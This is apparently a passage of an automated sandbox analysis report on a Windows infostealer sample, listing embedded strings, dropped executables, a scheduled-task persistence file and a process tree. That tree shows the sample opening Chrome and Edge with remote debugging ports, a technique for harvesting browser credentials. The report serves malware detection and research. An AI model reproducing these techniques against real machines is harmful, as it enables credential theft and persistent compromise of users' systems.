Source: chromecache_105.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_105.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: CBAKEBGIIDAFIDHIIECF.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: chromecache_105.5.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr String found in binary or memory: https://support.mozilla.org
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp, CBAKEBGIIDAFIDHIIECF.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: chromecache_105.5.dr String found in binary or memory: https://www.google.com
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_105.5.dr String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_105.5.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_105.5.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp, CBAKEBGIIDAFIDHIIECF.0.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1970779986.0000000000455000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1970779986.0000000000424000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: file.exe, 00000000.00000002.1970779986.0000000000455000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1970779986.0000000000424000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1970779986.0000000000455000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1857281479.00000000238C7000.00000004.00000020.00020000.00000000.sdmp, IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.1970779986.0000000000455000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49743 version: TLS 1.2

System Summary

Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: KJJJKFIIIJ.exe.0.dr Static PE information: section name:
Source: KJJJKFIIIJ.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.16.dr Static PE information: section name:
Source: skotes.exe.16.dr Static PE information: section name: .idata
Source: random[1].exe.20.dr Static PE information: section name:
Source: random[1].exe.20.dr Static PE information: section name: .idata
Source: random[1].exe.20.dr Static PE information: section name:
Source: 5762ea743c.exe.20.dr Static PE information: section name:
Source: 5762ea743c.exe.20.dr Static PE information: section name: .idata
Source: 5762ea743c.exe.20.dr Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A2CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 20_2_00A2CB97
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC0DE10 0_2_6CC0DE10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC1DFC0 0_2_6CC1DFC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC83FC0 0_2_6CC83FC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB21F90 0_2_6CB21F90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBABFF0 0_2_6CBABFF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB35F20 0_2_6CB35F20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAF5F30 0_2_6CAF5F30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC57F20 0_2_6CC57F20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC5B8F0 0_2_6CC5B8F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBDF8F0 0_2_6CBDF8F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB0D8E0 0_2_6CB0D8E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB338E0 0_2_6CB338E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB9F8C0 0_2_6CB9F8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB5D810 0_2_6CB5D810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBD1990 0_2_6CBD1990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB11980 0_2_6CB11980
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB659F0 0_2_6CB659F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB979F0 0_2_6CB979F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB399D0 0_2_6CB399D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB999C0 0_2_6CB999C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBB5920 0_2_6CBB5920
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC4F900 0_2_6CC4F900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB7F960 0_2_6CB7F960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBBD960 0_2_6CBBD960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBDDAB0 0_2_6CBDDAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB01AE0 0_2_6CB01AE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBFDA30 0_2_6CBFDA30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC89A50 0_2_6CC89A50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB3FA10 0_2_6CB3FA10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBA1A10 0_2_6CBA1A10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBC9BB0 0_2_6CBC9BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB59BA0 0_2_6CB59BA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBE5B90 0_2_6CBE5B90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAF1B80 0_2_6CAF1B80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB47BF0 0_2_6CB47BF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB4BB20 0_2_6CB4BB20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBDFB60 0_2_6CBDFB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB014E0 0_2_6CB014E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC814A0 0_2_6CC814A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBE9430 0_2_6CBE9430
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: 16_2_009978BB 16_2_009978BB
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: 16_2_00997049 16_2_00997049
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: 16_2_00998860 16_2_00998860
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: 16_2_009931A8 16_2_009931A8
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: 16_2_00A681D3 16_2_00A681D3
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: 16_2_00A68101 16_2_00A68101
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: 16_2_00954B30 16_2_00954B30
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: 16_2_00954DE0 16_2_00954DE0
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: 16_2_00992D10 16_2_00992D10
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: 16_2_0099779B 16_2_0099779B
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: 16_2_00987F36 16_2_00987F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_00A578BB 17_2_00A578BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_00A58860 17_2_00A58860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_00A57049 17_2_00A57049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_00A531A8 17_2_00A531A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_00A14B30 17_2_00A14B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_00A14DE0 17_2_00A14DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_00A52D10 17_2_00A52D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_00A5779B 17_2_00A5779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 17_2_00A47F36 17_2_00A47F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 18_2_00A578BB 18_2_00A578BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 18_2_00A58860 18_2_00A58860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 18_2_00A57049 18_2_00A57049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 18_2_00A531A8 18_2_00A531A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 18_2_00A14B30 18_2_00A14B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 18_2_00A14DE0 18_2_00A14DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 18_2_00A52D10 18_2_00A52D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 18_2_00A5779B 18_2_00A5779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 18_2_00A47F36 18_2_00A47F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A1E530 20_2_00A1E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A36192 20_2_00A36192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A58860 20_2_00A58860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A14B30 20_2_00A14B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A14DE0 20_2_00A14DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A52D10 20_2_00A52D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A30E13 20_2_00A30E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A57049 20_2_00A57049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A531A8 20_2_00A531A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A31602 20_2_00A31602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A5779B 20_2_00A5779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A578BB 20_2_00A578BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A33DF1 20_2_00A33DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 20_2_00A47F36 20_2_00A47F36
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Code function: String function: 009680C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00A48E10 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00A2D64E appears 80 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00A2D942 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00A2D663 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00A2DF80 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00A27A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00A280C0 appears 392 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CB23620 appears 95 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CC8D930 appears 57 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CC809D0 appears 303 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CC39F30 appears 51 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CB29B10 appears 95 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CC8DAE0 appears 72 times
Source: file.exe, 00000000.00000002.2015458484.000000006FE52000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2014762713.000000006CCD5000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: random[1].exe.20.dr Static PE information: Section: ZLIB complexity 0.997977368772242
Source: random[1].exe.20.dr Static PE information: Section: kgsecyxg ZLIB complexity 0.9945889506242479
Source: 5762ea743c.exe.20.dr Static PE information: Section: ZLIB complexity 0.997977368772242
Source: 5762ea743c.exe.20.dr Static PE information: Section: kgsecyxg ZLIB complexity 0.9945889506242479
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@39/61@9/9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB60300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 0_2_6CB60300
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\OFRH31K3.htm
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2014595632.000000006CC8F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1599724140.000000001D405000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738817732.000000001D3F9000.00000004.00000020.00020000.00000000.sdmp, DAEGIDHDHIDGIEBGIJEH.0.dr, EBFHJEGDAFHIJKECFBKJ.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2013954861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe ReversingLabs: Detection: 47%
Source: file.exe String found in binary or memory: /addC)
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe String found in binary or memory: 6RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeh
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2084,i,15082746672518523759,5591991654557497421,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2440 --field-trial-handle=2236,i,13354329722629723967,17457331017763836313,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2272,i,9092242746492624172,9017713632823041127,262144 /prefetch:3
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\KJJJKFIIIJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\KJJJKFIIIJ.exe "C:\Users\user\Documents\KJJJKFIIIJ.exe"
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe "C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\KJJJKFIIIJ.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2084,i,15082746672518523759,5591991654557497421,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
